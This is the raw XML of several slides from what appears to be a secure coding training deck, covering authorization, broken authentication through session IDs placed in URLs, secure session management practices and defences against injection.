              <a:gd name="connsiteX2" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY2" fmla="*/ 441903 h 441903"/>
              <a:gd name="connsiteX3" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY3" fmla="*/ 441903 h 441903"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 696224"/>
              <a:gd name="connsiteY0" fmla="*/ 106604 h 464387"/>
              <a:gd name="connsiteX1" fmla="*/ 564423 w 696224"/>
              <a:gd name="connsiteY1" fmla="*/ 45352 h 464387"/>
              <a:gd name="connsiteX2" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY2" fmla="*/ 464387 h 464387"/>
              <a:gd name="connsiteX3" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY3" fmla="*/ 464387 h 464387"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="696224" h="464387">
                <a:moveTo>
                  <a:pt x="0" y="106604"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="258916" y="55803"/>
                  <a:pt x="390513" y="-65700"/>
                  <a:pt x="564423" y="45352"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="738333" y="156404"/>
                  <a:pt x="674257" y="394548"/>
                  <a:pt x="696224" y="464387"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="696224" y="464387"/>
                </a:ln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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365908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7047681" y="4351304"/>
            <a:ext cx="2096319" cy="2235092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52826AB6-5ACC-472D-88C2-075B1BDB84B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494032" y="1285863"/>
            <a:ext cx="8460152" cy="4935408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Builds on authentication by verifying that the authenticated user or process has permission to perform specific tasks within the application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Essentially provides a key to various "rooms" within the application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different users are authorized to access different functions and data within the system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So security checks typically involve both authentication and authorization working together. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization is useless if you don’t first authenticate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{057D2BCD-501E-4B02-BAD0-2022633410C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3116E134-9374-400A-8CB3-064CA143BBDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5300767" y="3760841"/>
            <a:ext cx="2261432" cy="859399"/>
            <a:chOff x="5287920" y="1108898"/>
            <a:chExt cx="2261432" cy="859399"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5287920" y="1108898"/>
              <a:ext cx="1875504" cy="859399"/>
              <a:chOff x="4724400" y="3539159"/>
              <a:chExt cx="1875504" cy="859399"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rounded Rectangle 135"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5228304" y="3539159"/>
                <a:ext cx="1371600" cy="23567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Authorization</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9"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l="64880"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm rot="5400000">
                <a:off x="5163964" y="3299787"/>
                <a:ext cx="659207" cy="153833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5821321" y="1323939"/>
              <a:ext cx="1728031" cy="253916"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Access to various “rooms”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4621046" y="5178853"/>
            <a:ext cx="2478332" cy="1058463"/>
            <a:chOff x="5294068" y="2747073"/>
            <a:chExt cx="2478332" cy="1058463"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5294068" y="2747073"/>
              <a:ext cx="1945355" cy="1058463"/>
              <a:chOff x="4654549" y="1944629"/>
              <a:chExt cx="1945355" cy="1058463"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Rounded Rectangle 135"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5228304" y="1944629"/>
                <a:ext cx="1371600" cy="235675"/>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Authentication</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2054" name="Picture 6" descr="Image result for key png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId3">
                <a:extLst>
                  <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                    <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                  </a:ext>
                </a:extLst>
              </a:blip>
              <a:srcRect r="55419"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm rot="5400000">
                <a:off x="5005329" y="1815536"/>
                <a:ext cx="836776" cy="153833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5817423" y="2963832"/>
              <a:ext cx="1954977" cy="246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Access to application “front door”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Freeform: Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="558235">
            <a:off x="7410468" y="4093021"/>
            <a:ext cx="828352" cy="438166"/>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904568"/>
              <a:gd name="connsiteY0" fmla="*/ 27693 h 578299"/>
              <a:gd name="connsiteX1" fmla="*/ 645445 w 904568"/>
              <a:gd name="connsiteY1" fmla="*/ 87309 h 578299"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY2" fmla="*/ 578299 h 578299"/>
              <a:gd name="connsiteX3" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY3" fmla="*/ 578299 h 578299"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 904568"/>
              <a:gd name="connsiteY0" fmla="*/ 37705 h 588311"/>
              <a:gd name="connsiteX1" fmla="*/ 645445 w 904568"/>
              <a:gd name="connsiteY1" fmla="*/ 97321 h 588311"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY2" fmla="*/ 588311 h 588311"/>
              <a:gd name="connsiteX3" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY3" fmla="*/ 588311 h 588311"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 904568"/>
              <a:gd name="connsiteY0" fmla="*/ 37229 h 587835"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 904568"/>
              <a:gd name="connsiteY1" fmla="*/ 98031 h 587835"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY2" fmla="*/ 587835 h 587835"/>
              <a:gd name="connsiteX3" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY3" fmla="*/ 587835 h 587835"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1023068"/>
              <a:gd name="connsiteY0" fmla="*/ 37229 h 630910"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1023068"/>
              <a:gd name="connsiteY1" fmla="*/ 98031 h 630910"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 1023068"/>
              <a:gd name="connsiteY2" fmla="*/ 587835 h 630910"/>
              <a:gd name="connsiteX3" fmla="*/ 1023068 w 1023068"/>
              <a:gd name="connsiteY3" fmla="*/ 611574 h 630910"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1113433"/>
              <a:gd name="connsiteY0" fmla="*/ 20150 h 594495"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1113433"/>
              <a:gd name="connsiteY1" fmla="*/ 80952 h 594495"/>
              <a:gd name="connsiteX2" fmla="*/ 1103645 w 1113433"/>
              <a:gd name="connsiteY2" fmla="*/ 362390 h 594495"/>
              <a:gd name="connsiteX3" fmla="*/ 1023068 w 1113433"/>
              <a:gd name="connsiteY3" fmla="*/ 594495 h 594495"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1023068"/>
              <a:gd name="connsiteY0" fmla="*/ 28338 h 602683"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1023068"/>
              <a:gd name="connsiteY1" fmla="*/ 89140 h 602683"/>
              <a:gd name="connsiteX2" fmla="*/ 1023068 w 1023068"/>
              <a:gd name="connsiteY2" fmla="*/ 602683 h 602683"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1081569"/>
              <a:gd name="connsiteY0" fmla="*/ 22376 h 438166"/>
              <a:gd name="connsiteX1" fmla="*/ 712913 w 1081569"/>
              <a:gd name="connsiteY1" fmla="*/ 83178 h 438166"/>
              <a:gd name="connsiteX2" fmla="*/ 1081570 w 1081569"/>
              <a:gd name="connsiteY2" fmla="*/ 438166 h 438166"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1081569" h="438166">
                <a:moveTo>
                  <a:pt x="0" y="22376"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="258916" y="-28425"/>
                  <a:pt x="532651" y="13880"/>
                  <a:pt x="712913" y="83178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="893175" y="152476"/>
                  <a:pt x="1016955" y="331178"/>
                  <a:pt x="1081570" y="438166"/>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1" name="Freeform: Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="558235">
            <a:off x="7386277" y="4085012"/>
            <a:ext cx="1526083" cy="641568"/>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680072"/>
              <a:gd name="connsiteY0" fmla="*/ 60648 h 627318"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1680072"/>
              <a:gd name="connsiteY1" fmla="*/ 50815 h 627318"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 1680072"/>
              <a:gd name="connsiteY2" fmla="*/ 611254 h 627318"/>
              <a:gd name="connsiteX3" fmla="*/ 1680072 w 1680072"/>
              <a:gd name="connsiteY3" fmla="*/ 460783 h 627318"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 60648 h 671908"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 50815 h 671908"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 611254 h 671908"/>
              <a:gd name="connsiteX3" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY3" fmla="*/ 622829 h 671908"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 27986 h 593945"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 18153 h 593945"/>
              <a:gd name="connsiteX2" fmla="*/ 1367556 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 80880 h 593945"/>
              <a:gd name="connsiteX3" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY3" fmla="*/ 590167 h 593945"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 61480 h 623661"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 51647 h 623661"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 623661 h 623661"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 29192 h 591373"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 19359 h 591373"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 591373 h 591373"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 60040 h 622221"/>
              <a:gd name="connsiteX1" fmla="*/ 691744 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 3908 h 622221"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 622221 h 622221"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 81596 h 643777"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 2315 h 643777"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 643777 h 643777"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 81737 h 643918"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 2456 h 643918"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 643918 h 643918"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 79387 h 641568"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 106 h 641568"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 641568 h 641568"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 79387 h 641568"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 106 h 641568"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 641568 h 641568"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1992588" h="641568">
                <a:moveTo>
                  <a:pt x="0" y="79387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115159" y="63514"/>
                  <a:pt x="180938" y="8781"/>
                  <a:pt x="668594" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1156250" y="-8569"/>
                  <a:pt x="1716756" y="522399"/>
                  <a:pt x="1992588" y="641568"/>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2" name="Freeform: Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="913060" flipV="1">
            <a:off x="7087277" y="5297085"/>
            <a:ext cx="871664" cy="418137"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 904568"/>
              <a:gd name="connsiteY0" fmla="*/ 60648 h 611254"/>
              <a:gd name="connsiteX1" fmla="*/ 668594 w 904568"/>
              <a:gd name="connsiteY1" fmla="*/ 50815 h 611254"/>
              <a:gd name="connsiteX2" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY2" fmla="*/ 611254 h 611254"/>
              <a:gd name="connsiteX3" fmla="*/ 904568 w 904568"/>
              <a:gd name="connsiteY3" fmla="*/ 611254 h 611254"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1101338"/>
              <a:gd name="connsiteY0" fmla="*/ 94381 h 593568"/>
              <a:gd name="connsiteX1" fmla="*/ 865364 w 1101338"/>
              <a:gd name="connsiteY1" fmla="*/ 33129 h 593568"/>
              <a:gd name="connsiteX2" fmla="*/ 1101338 w 1101338"/>
              <a:gd name="connsiteY2" fmla="*/ 593568 h 593568"/>
              <a:gd name="connsiteX3" fmla="*/ 1101338 w 1101338"/>
              <a:gd name="connsiteY3" fmla="*/ 593568 h 593568"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 696224"/>
              <a:gd name="connsiteY0" fmla="*/ 213160 h 570943"/>
              <a:gd name="connsiteX1" fmla="*/ 460250 w 696224"/>
              <a:gd name="connsiteY1" fmla="*/ 10504 h 570943"/>
              <a:gd name="connsiteX2" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY2" fmla="*/ 570943 h 570943"/>
              <a:gd name="connsiteX3" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY3" fmla="*/ 570943 h 570943"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 696224"/>
              <a:gd name="connsiteY0" fmla="*/ 84120 h 441903"/>
              <a:gd name="connsiteX1" fmla="*/ 564423 w 696224"/>
              <a:gd name="connsiteY1" fmla="*/ 22868 h 441903"/>
              <a:gd name="connsiteX2" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY2" fmla="*/ 441903 h 441903"/>
              <a:gd name="connsiteX3" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY3" fmla="*/ 441903 h 441903"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 696224"/>
              <a:gd name="connsiteY0" fmla="*/ 106604 h 464387"/>
              <a:gd name="connsiteX1" fmla="*/ 564423 w 696224"/>
              <a:gd name="connsiteY1" fmla="*/ 45352 h 464387"/>
              <a:gd name="connsiteX2" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY2" fmla="*/ 464387 h 464387"/>
              <a:gd name="connsiteX3" fmla="*/ 696224 w 696224"/>
              <a:gd name="connsiteY3" fmla="*/ 464387 h 464387"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="696224" h="464387">
                <a:moveTo>
                  <a:pt x="0" y="106604"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="258916" y="55803"/>
                  <a:pt x="390513" y="-65700"/>
                  <a:pt x="564423" y="45352"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="738333" y="156404"/>
                  <a:pt x="674257" y="394548"/>
                  <a:pt x="696224" y="464387"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="696224" y="464387"/>
                </a:ln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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2361478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44</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If your application does not implement authentication functions correctly, you make it possible for attackers to compromise a user's password or session. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example, a web app supports URL rewriting, which allows an authenticated user's session ID to be placed right in the URL: </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	http://www.example.com/sale/saleitems/jsessionid=A2423BFY	W6423469153/?item=expensive_laptop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user has already logged on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If they knowingly or unknowingly (through cross-site scripting) share this link with others, those people could use their session to make purchases without their knowledge or consent.</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Broken Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1667365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45</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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid authentication and session management defects, make sure your software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bases authentication and session management capabilities upon a single set of strong authentication and session management controls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires strong passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires users to change passwords periodically and not reuse </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>old passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does not log passwords entered on failed login attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blocks repeated failed attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides a single, careful mechanism through which passwords can be changed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does not store passwords.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Secure Authentication and Session Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B57F9768-FB84-4C0A-A227-62DF88E45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3AFBD1F5-ED19-46B7-8C35-5965CB761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5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46</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4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design your software to prevent user input (data) from being interpreted as a command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be careful using APIs that may not prevent user input from being </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>interpreted as a command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If it is not practical to implement other protections, escape input </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>data so it will be treated as data, not commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use input validation to accept only characters that are allowed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When possible, use strong data typing on variables that hold user input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit users' database access to minimize the damage that can be caused by SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
